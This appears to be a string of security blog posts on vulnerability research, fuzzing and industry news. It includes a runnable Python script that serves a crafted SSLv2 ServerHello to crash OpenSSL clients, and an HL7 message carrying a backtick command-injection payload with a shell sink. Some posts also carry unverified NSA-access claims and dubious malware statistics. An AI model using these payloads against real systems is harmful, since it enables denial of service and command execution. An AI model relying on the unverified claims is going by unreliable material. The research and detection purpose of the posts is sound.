From description to exploit

Every once in a while I get to work on a “known” vulnerability for which very little, or even no, technical detail is available. Such vulnerabilities tend to be “known” only to their finder and to the vendor that fixed them. The rest of us know they exist because an advisory was published, and not much more than that.
Once a vulnerability has been fixed, nobody (neither researcher nor vendor) has any interest in disclosing its details, as it is no longer interesting. That leaves security researchers with insufficient information to confirm whether the vulnerability affects anyone else besides the specific vendor, and the specific vendor version.

This is the point I reached today: our team wanted to update a test in our vulnerability scanner to check for the exploitability of a certain vulnerability on a new platform. The version number indicated the platform was vulnerable, but there was no way to confirm it, as the technical description of the vulnerability was inadequate, and checking only the version is a sure way to generate a multitude of false positives.
The only information available was the advisory text:
The get_server_hello function in the SSLv2 client code in OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and earlier versions allows remote servers to cause a denial of service (client crash) via unknown vectors that trigger a null pointer dereference.

I was determined to discover what the “unknown vector” was, and to see whether the product I was testing was in fact vulnerable.

The first step was to understand what SSLv2 exactly is and how to get a client that speaks it. Simple enough: “openssl s_client” was just what I needed, a sample SSL client whose SSLv2 code path calls the get_server_hello() function.

Then I needed to create an SSLv2 session. This proved a bit more difficult, as SSLv2 is now considered insecure and most SSL installations disable it; Firefox no longer connects to sites that only offer it. Apache 2 hasn’t given up on it, though, and you can turn SSLv2 support on quite easily through the SSLProtocol directive.

Once that was available, I launched beSTORM’s auto-learn mechanism and had it capture the SSLv2 traffic. A complete session can be quite extensive, but I only needed the first packets, since those are what get_server_hello() looks at. I then used the pcap export capability to load the captured data into Wireshark and used its existing dissection to mark which field was what: which byte was the length of what, which was a flag, and so on.

Then I told beSTORM to listen for incoming traffic and play around with the values. I concentrated mainly on the following ServerHello parameters:

  • Packet Length (total length)
  • Session ID Hit (valid values are 0x01 and 0x00)
  • Certificate Type (it is an enumeration of three possible values)
  • Certificate Length
  • Certificate Value
  • Cipher Spec Length
  • Cipher Spec Value
  • Connection ID Length
  • Connection ID Value

After a few thousand combinations, taking about 50 minutes, the openssl client crashed. The combination beSTORM had arrived at: Session ID Hit set to 0x00, Certificate Type set to NULL (0x00), Certificate Length 0 with no Certificate Value, Cipher Spec Length 0 with no Cipher Spec Value, and the Connection ID left at its captured default values:

Program received signal SIGSEGV, Segmentation fault.
0x0808638d in get_server_hello (s=0x81aed90) at s2_clnt.c:542
542 if (s->session->peer != s->session->sess_cert->peer_key->x509)
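The ServerHello that produced this crash, reconstructed as an added example. This is not beSTORM’s module, the published exploit, or OpenSSL’s code; the advisory text quoted above is that of CVE-2006-4343. The script frames an SSLv2 record, builds the message with the field values listed above, serves it once to any SSLv2 client that connects, and includes a parser that rejects the degenerate shape a client must not trust. Assumptions: the 16 zero bytes stand in for the captured Connection ID, the X.509 certificate type is 0x01 as in the SSLv2 draft, and the listening host and port are placeholders.

```python
"""SSLv2 SERVER-HELLO builder, one-shot server and checking parser (added example)."""
import socket
import struct

SSL2_MT_SERVER_HELLO = 0x04
SSL2_CT_X509_CERTIFICATE = 0x01   # certificate type the SSLv2 draft defines
SSL2_VERSION = 0x0002
SERVER_HELLO_FIXED_LEN = 11       # type + hit + cert type + version(2) + three lengths(2 each)


def ssl2_record(body: bytes) -> bytes:
    """Frame a message with the 2-byte SSLv2 record header: the high bit of the
    first byte set means "2-byte header, no padding"; the remaining 15 bits carry
    the body length."""
    if len(body) > 0x7FFF:
        raise ValueError("a 2-byte SSLv2 header carries at most 32767 bytes")
    return struct.pack("!H", 0x8000 | len(body)) + body


def build_server_hello(session_id_hit=0, cert_type=SSL2_CT_X509_CERTIFICATE,
                       certificate=b"", cipher_specs=b"", connection_id=b"\x00" * 16):
    """SERVER-HELLO layout from the SSLv2 draft: MSG-SERVER-HELLO, SESSION-ID-HIT,
    CERTIFICATE-TYPE, SERVER-VERSION (2), CERTIFICATE-LENGTH (2), CIPHER-SPECS-LENGTH (2),
    CONNECTION-ID-LENGTH (2), then CERTIFICATE-DATA, CIPHER-SPECS-DATA, CONNECTION-ID-DATA."""
    fixed = struct.pack("!BBBHHHH", SSL2_MT_SERVER_HELLO, session_id_hit, cert_type,
                        SSL2_VERSION, len(certificate), len(cipher_specs), len(connection_id))
    return ssl2_record(fixed + certificate + cipher_specs + connection_id)


def crashing_server_hello() -> bytes:
    """The combination beSTORM found: no session hit, certificate type 0, empty
    certificate, empty cipher specs, a connection ID of the captured length (the
    16 zero bytes are a placeholder for the captured value, an assumption)."""
    return build_server_hello(session_id_hit=0, cert_type=0, certificate=b"",
                              cipher_specs=b"", connection_id=b"\x00" * 16)


def parse_server_hello(record: bytes) -> dict:
    """Parse a framed SERVER-HELLO the way a hardened client should: the three
    length fields must account for the whole record, and a session miss must carry
    an X.509 certificate and at least one 3-byte cipher spec. Rejecting the message
    here is what keeps a client from later dereferencing a certificate it never got."""
    if len(record) < 2 or not record[0] & 0x80:
        raise ValueError("expected a 2-byte SSLv2 record header")
    length = struct.unpack("!H", record[:2])[0] & 0x7FFF
    body = record[2:2 + length]
    if len(body) != length or length < SERVER_HELLO_FIXED_LEN:
        raise ValueError("truncated record")
    mt, hit, ct, ver, cert_len, cs_len, cid_len = struct.unpack(
        "!BBBHHHH", body[:SERVER_HELLO_FIXED_LEN])
    if mt != SSL2_MT_SERVER_HELLO:
        raise ValueError("not a SERVER-HELLO")
    if SERVER_HELLO_FIXED_LEN + cert_len + cs_len + cid_len != length:
        raise ValueError("length fields do not add up to the record length")
    off = SERVER_HELLO_FIXED_LEN
    cert = body[off:off + cert_len]
    off += cert_len
    specs = body[off:off + cs_len]
    off += cs_len
    cid = body[off:off + cid_len]
    if hit not in (0, 1):
        raise ValueError("SESSION-ID-HIT must be 0 or 1")
    if hit == 0:
        if ct != SSL2_CT_X509_CERTIFICATE or cert_len == 0:
            raise ValueError("session miss without an X.509 certificate")
        if cs_len == 0 or cs_len % 3:
            raise ValueError("session miss without a usable cipher-spec list")
    return {"hit": hit, "cert_type": ct, "version": ver, "certificate": cert,
            "cipher_specs": [specs[i:i + 3] for i in range(0, cs_len, 3)],
            "connection_id": cid}


def is_rejected(record: bytes) -> bool:
    """True if the hardened parser refuses the record."""
    try:
        parse_server_hello(record)
    except ValueError:
        return True
    return False


def serve_once(payload: bytes, host: str = "127.0.0.1", port: int = 4433) -> bytes:
    """Accept one TCP client, read its CLIENT-HELLO, answer with `payload`, and
    return what the client sent. Point an SSLv2-capable client at it, e.g.
    `openssl s_client -ssl2 -connect 127.0.0.1:4433` (host and port are assumptions)."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((host, port))
        srv.listen(1)
        conn, _ = srv.accept()
        with conn:
            client_hello = conn.recv(4096)
            conn.sendall(payload)
            return client_hello


if __name__ == "__main__":
    serve_once(crashing_server_hello())
```

The length arithmetic is the part worth keeping straight: the fixed header is 11 bytes, so the crashing record is 2 + 11 + 16 = 29 bytes with a length field of 27 (0x80 0x1b), and the parser refuses it not because any length is wrong but because a session miss arrived without a certificate or a cipher spec, which is exactly the state the crashing client went on to dereference.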

Now all I needed was to instruct beSTORM to build a module from it. Job done.

From a very vague description to an exploit in about an hour :-)

An exploit can be found at: OpenSSL SSLv2 Client Crash (NULL Reference)


‘Tis the season

The last week of December is sometimes an interesting week in our industry.

IT security is often pictured as a fight between the ‘good guys’ and the ‘bad guys’. Well, from December 25th to January 1st the battlefield is noticeably skewed in favor of the bad guys.

It’s not too difficult to see why: the CSOs are on vacation, the IT staff is minimal, and nobody would risk deploying a patch that could affect the entire company come January 1st (who wants the boss to come back to work after a New Year’s party and find out her computer doesn’t boot?). On the vendor side things are similar; you had better not find a critical exploitable buffer overflow in this critical week, since there will be no one to fix it, or to deploy a workaround.

Last year, Determina reported the .ANI buffer overflow to Microsoft in December, but the acknowledgment from Microsoft only came in early January (and the patch itself only came in April).
Two years ago the WMF exploit made noise, and since the Microsoft engineers were on vacation, Ilfak and ZERT had to pitch in and release third-party patches for the problem.

In Christmas 2004, ironically enough, Microsoft was busy with the first .ANI vulnerability (that one reported by eEye), almost identical to the one that followed two years later, and again the patch waited until the MS QA team had had time to recover from the New Year’s hangover.

Six years ago, David Litchfield turned Oracle’s then marketing tagline “Unbreakable” into pure mockery by discovering a series of remotely exploitable vulnerabilities, which of course were not patched in time for the Santa Claus season.

These stories remind me of the Christmas party at the Nakatomi building in “Die Hard”, only in our case the attackers have the additional benefit of “out of office” messages telling them who left their post (and not every company has a John McClane to save it from imminent doom).

Will this holiday season be quiet? So far there aren’t any clouds on the horizon, so let’s hope it stays that way for another 10 days or so. After all, even we security folks need our R&R…

Happy holidays everyone!


Cryptome: NSA has real-time access to Hushmail servers

A frequent source, ‘A’, who sends updated NSA-affiliated IP resources to Cryptome’s Web site, has reported the following new information:

Certain privacy/full-session SSL email hosting services have been purchased, or have had their operational control changed, by the NSA and affiliates within the past few months, through private intermediary entities.

Reportedly the following services are controlled:

Hushmail – based in Canada,
Guardster – based in USA,
and
SAFe-mail.net – based in Israel.

Link here: NSA Controls SSL Email Hosting Services

Update 22nd Dec: the Guardster Team posted its response to Cryptome on 21st Dec:

We can assure you that we do not cooperate with the NSA or any other government agency anywhere in the world. We invite whomever is making this statement to provide proof, rather than making a baseless accusation.
….

The response from the Safe-mail.net Team (24th Dec) is the following:

1. We never had any contacts, direct or indirect, with the NSA or any other government agency anywhere in the world.
2. All software we use is in-house development.
3. We have never shared our technology with any other party.
….

Update 30th Dec: the Hushmail Team posted its response to Cryptome’s Web site yesterday:

Hush Communications Corporation, the company that provides the Hushmail.com email service, is not owned, wholly or in part, by any government agency.

Additionally, ‘More info on industry Windows security software’ has been released:

Zone Alarm, Symantec, McAfee: All facilitate Microsoft’s NSA-controlled remote admin access via IP/TCP ports 1024 through 1030; i.e. will allow access without security flag. Unknown whether or not software port forward routing by these same programs will defeat NSA access.

The post released on Cryptome.org on 1st Nov announced future updates with details related to this issue, and this is the first piece of that information.

To the new readers: Cryptome: NSA has access to Windows Mobile smartphones


New Security Threats & Solutions

Recently the security industry has found new hybrid viruses that top anything previously known. The people producing them are now said to operate almost like organized, funded groups, with their own research and development teams. That should be expected, really: there are plenty of groups out there willing to go to extreme lengths to attack the West.

What do these hybrid viruses do? 

One such virus, found in 2007, was named “Storm”. It has been called a worm and a Trojan as well as a virus, because it has features of both; I just call them all viruses. Storm apparently includes an SMTP relay and some sort of socket server capable of sending stolen information to many destinations, and it can even communicate with, and warn, other Storm-infected hosts across a network of many infected computers. One report said the botnet Storm creates has more combined criminal computing power than IBM’s best supercomputers. The virus has features I would rather not describe, because I don’t want to proliferate virus design. It arrives in an e-mail carrying an executable attachment, and users are tricked into running the attachment; that’s typical. Some estimates put the number of Storm-infected computers at more than 200 million worldwide, infected by e-mail, and only the US and Europe have gotten some control over it at this time.

What’s the solution? 

Actually the solution is to not execute any program from any source except your trustworthy business associates, preferably within the US. Wherever you are, you need educated and trustworthy associates so they don’t accidentally propagate viruses. With e-mail you also need to be sure a message is legitimate and not artificially produced by a spam virus using your friend’s e-mail address. That’s the rule for me, but many of my clients just can’t keep to these rules, so I install good anti-virus software on their computers.

There are a lot of anti-virus packages out there, but big names are not always best. For example, Trend Micro is recommended by many, but tests have shown it is not that thorough, and Microsoft has been unwilling to participate in tests and prove the quality of its AV software. McAfee is what I use for many of my clients; it has had an excellent track record for many years at a low price. I also use Symantec, which is possibly the best of all.

I know better than to run any e-mail attachment, or to download and run any questionable software product, particularly from non-American companies, so I have not had a virus that I can remember, and I have not used anti-virus software on my own computers for nearly 10 years. Well, before 2000 I think I had some minor virus problems: I unfortunately downloaded and used some overseas software and started having computer problems, so I backed everything up and wiped my hard drive clean. That’s how I solve my virus problems. Were you expecting some elaborate solution? True, you need more advanced solutions, particularly for big networks…

Advanced corporate solutions: 

Most importantly, again, the solution is not to execute a questionable program. This is especially important on servers, and it is ultra-important that administrators be careful not to run any questionable program. Second, you need good firewall solutions implemented on your network; this holds down things like the Storm virus. These things are standard practice, of course. I have actually averted these problems altogether for administration by using a product called Iron-Admin from WiseFirm, which I use to administer all of my customers’ servers and workstations. It lets you administer all your network computers from one workstation, including Windows and Unix/Solaris/Linux servers, and you never have to execute any programs at all. Iron-Admin uses strong encryption for all its communications, and from one computer you can remotely administer hundreds of servers and a limitless number of workstations, and back them all up at scheduled times. Another similar product I have tried is InterStructures, but it is not compatible with AIX and Solaris and does not do backups.

You may use anti-virus software, but honestly it is overrated. Consider the case of a new virus such as Storm: your anti-virus software will not recognize it initially, and if your company is so unfortunate that the virus gets access to administration-level servers, your whole company’s data could fall. Anti-virus software is a good step toward protecting ordinary users’ computers to a limited degree, and toward stopping a virus eventually, after it has been discovered.

I will get into more detail on the security factors we have looked at in this article, and some additional ones, in future blogs here.

Orkut virus/worm on the loose

An Orkut-based virus/worm appears to be on the loose; it propagates by posting notes in people’s scrapbooks. So chances are that if you got a new scrapbook item on your long-unused Orkut account, it is because the worm has infected one of your friends there.

The virus/worm uses JavaScript code to propagate. Its source can be found here: hxxp://files.myopera.com/virusdoorkut/files/virus.js
Update: Google is apparently actively deleting items from the scrapbooks of people who were infected and who have infected others.

Update 2: More details can be found here: http://antrix.net/journal/techtalk/orkut_xss.html


beThere backdoor still there

I’ve said it before – some vendors just don’t get it. Security culture isn’t something you can fake.

Well, according to The Register, beThere customers are still vulnerable to the security flaw Sid reported here back in February. When you consider that this was reported to beThere long before Sid published the details, you can see how embarrassing the situation is.
Some companies think security advisories should be handled by the PR department. Well, they shouldn’t. If you’re a beThere customer, fix your system pronto, and take note of your ISP’s attitude when it comes to your security.


Pushdo analysis

Joe has a nice write-up on the inner workings of the Pushdo Trojan.

Pushdo is interesting since it was written for “future use”, i.e. it updates itself to obey its master’s latest needs and requests. It also has intelligence-collecting routines, and in general it shows how sophisticated the bad guys are getting.


Fuzzing is not just buffer overflows

We recently introduced a few improvements to our beSTORM fuzzing framework to make it test for things other than the common buffer overflow, format string, integer overflow, off-by-one, etc. These include less common vulnerabilities such as command execution and code injection. Such vulnerabilities are more complicated to test for, as they require close integration with the product under test: namely, monitoring what it tries to open (similar to what Filemon does) and what it tries to execute (in the case of Perl, PHP, etc.).

Armed with these new tests, we took a candidate we knew had none of the “common” vulnerabilities, as it is written in Perl, and which as such had never been audited for vulnerabilities, launched our fuzzing module for HL7 (Health Level 7) and awaited the results. After several hundred tests it detected something very particular:

Sending:

\x0bMSH|^~\\&|||||20071203173658|||20071203173658.98 \x0d`/usr/bin/whoami`|||XXX|\x0d\x1c\x0d

Instead of the “normal” – non fuzzed traffic:

\x0bMSH|^~\\&|||||20071203173658|||20071203173658.98 \x0dMSH|||XXX|\x0d\x1c\x0d

caused the program located at /usr/bin/whoami to be launched. Of course this isn’t a ready-made exploit, but it is a vulnerability nonetheless; you can probably guess what the next step is :)
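The two messages above, worked through as an added example. This is not beSTORM’s HL7 module and not the Perl toolkit’s code or its fix: it shows the MLLP framing and a strict parser for the format, the segment-ID mutation that turns the normal message into the fuzzed one byte for byte, and a shell-based sink that stands in for whatever Perl construct expanded the backticks (the post does not say which, so the sink, the constant names and the use of echo are assumptions).

```python
"""MLLP/HL7 framing, strict parser, the segment-ID mutation from the post, and a
shell sink showing why a backtick in a segment ID matters (added example)."""
import re
import subprocess

VT, FS, CR = b"\x0b", b"\x1c", b"\x0d"           # MLLP: <VT> message <FS><CR>
SEGMENT_ID = re.compile(rb"^[A-Z][A-Z0-9]{2}$")  # HL7 segment IDs are 3 characters

# The two messages quoted in the post, as byte strings (constructed from the text).
NORMAL = (b"\x0bMSH|^~\\&|||||20071203173658|||20071203173658.98 \x0d"
          b"MSH|||XXX|\x0d\x1c\x0d")
FUZZED = (b"\x0bMSH|^~\\&|||||20071203173658|||20071203173658.98 \x0d"
          b"`/usr/bin/whoami`|||XXX|\x0d\x1c\x0d")


def unframe(raw: bytes) -> list:
    """Strip the MLLP envelope and split on <CR>; HL7 segments end with <CR>, so
    the trailing empty piece is dropped."""
    if not (raw.startswith(VT) and raw.endswith(FS + CR)):
        raise ValueError("not an MLLP frame")
    return [seg for seg in raw[len(VT):-len(FS + CR)].split(CR) if seg]


def parse(raw: bytes) -> list:
    """Return [(segment id, fields), ...]. The field separator is MSH-1, the byte
    right after "MSH", as HL7 defines it. Every segment ID must match SEGMENT_ID:
    an ID that is going to be interpolated anywhere dynamic must be a bare identifier,
    and that is the check a fuzzed backtick payload has to fail."""
    segments = unframe(raw)
    if not segments or not segments[0].startswith(b"MSH"):
        raise ValueError("message must start with an MSH segment")
    sep = segments[0][3:4]
    parsed = []
    for seg in segments:
        seg_id, _, rest = seg.partition(sep)
        if not SEGMENT_ID.match(seg_id):
            raise ValueError("bad segment id %r" % seg_id)
        parsed.append((seg_id, rest.split(sep)))
    return parsed


def is_rejected(raw: bytes) -> bool:
    """True if the strict parser refuses the message."""
    try:
        parse(raw)
    except ValueError:
        return True
    return False


def fuzz_segment_id(raw: bytes, index: int, payload: bytes) -> bytes:
    """Replace the ID of segment `index` with `payload` and re-frame the message.
    fuzz_segment_id(NORMAL, 1, b"`/usr/bin/whoami`") reproduces FUZZED exactly."""
    segments = unframe(raw)
    sep = segments[0][3:4]
    _, _, rest = segments[index].partition(sep)
    segments[index] = payload + sep + rest
    return VT + CR.join(segments) + CR + FS + CR


def log_segment_via_shell(seg_id: bytes) -> str:
    """Sink analogous to the bug (an assumption, not the toolkit's code): the
    segment ID reaches an interpreter that performs command substitution. Perl's
    backtick operator and the shell both run what is between the backticks, so
    a segment named `/usr/bin/whoami` executes whoami."""
    cmd = "echo received segment " + seg_id.decode("latin-1")
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


if __name__ == "__main__":
    print(parse(NORMAL))
    print("fuzzed case reproduced:", fuzz_segment_id(NORMAL, 1, b"`/usr/bin/whoami`") == FUZZED)
    print("strict parser rejects it:", is_rejected(FUZZED))
    # A harmless stand-in for /usr/bin/whoami; the substitution still runs.
    print(log_segment_via_shell(b"`echo pwned`"), end="")
```

The point of the mutation function is that a protocol fuzzer for a textual format does not need to know anything about Perl: it only needs a structural model (here, segment IDs) and a dictionary of metacharacters, plus the process monitoring the post describes to notice that something outside the target got executed.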

Update: the author of the program has promptly fixed the vulnerability and released a new version, accessible through the toolkit’s CVS version.
P.S.: even though the software hadn’t been updated since March 2005, several vendors provide it as part of their HL7 implementations.

A CVE has been assigned to this vulnerability: CVE-2007-6264


The number of unpatched QuickTime flaws is: two

The number of recent QuickTime PoCs is remarkably large, and active exploitation has begun as well, as many readers know.

However, the QuickTime RTSP vulnerability reported on 23rd Nov is not the only one.

It appears that the WabiSabiLabi team has reported another flaw (they call it a zero-day vulnerability) in Apple’s QuickTime player too.

This is what their blog post states:

We just want to specify that the vulnerability shown on those POCs IS NOT the one present in our marketplace.

They are pointing at the PoCs listed at Milw0rm etc.

And a summary:

The first issue, reported by Krystian Kloskowski (aka h07), is CVE-2007-6166, CVSS score 9.3. For workarounds see US-CERT VU#659761.

The second issue, reported by an unknown person, is CVE-2007-6238, CVSS score 10.0. Reportedly ‘Affected system: Windows XP’.


Fuzzing the FIX Protocol

One of our customers has asked us to provide a beSTORM fuzzing module for the FIX protocol. For those who don’t know what FIX is: in layman’s terms, it is part of what allows the world of finance to work, being the Financial Information eXchange protocol. The protocol is fairly simple and very insecure, and not just because it is textual.

I will update you guys as soon as I can provide more details.


And the winner is …

Researchers from the Netherlands have predicted that the next president will be Paris Hilton, Oprah Winfrey, Al Gore… well, actually they don’t know, but what they do know is that they can create PDFs, or files in any other format that allows storing random bits without affecting the file, that all share the same MD5 value 3D515DEAD7AA16560ABA3E9DF05CBC80.

More details on the research can be found in their paper, Predicting the winner of the 2008 US Presidential Elections using a Sony PlayStation 3.


Tools, tools, tools.

Maltego GUI is off-the-freaking-chain. Check it out at http://www.paterva.com/web2/maltego/maltego-gui-1.0-download.html

Also, the folks at Security Compass have released some new Firefox plugins that should aid in detecting SQL injection and XSS. I’m between gigs, but will give these a good test drive the next time I’m tasked with a web application.

If one doesn’t already exist, I’d like an open source “Reporting Framework”: a Metasploit for power reporters. I spend at least 10% of my consulting hours on reporting, and I hate reporting. Feed this tool your raw findings and get back a standard report in the template of your choosing. All cross-referencing with CVE, CVSS, BID, NIST, etc. should be automagic, relevant references (links to patches, standards, etc.) should be inserted automatically, and there should even be an option for uploading screenshots tagged to an IP/FQDN and service…

Enjoy the holiday of your choosing,

!Dmitry
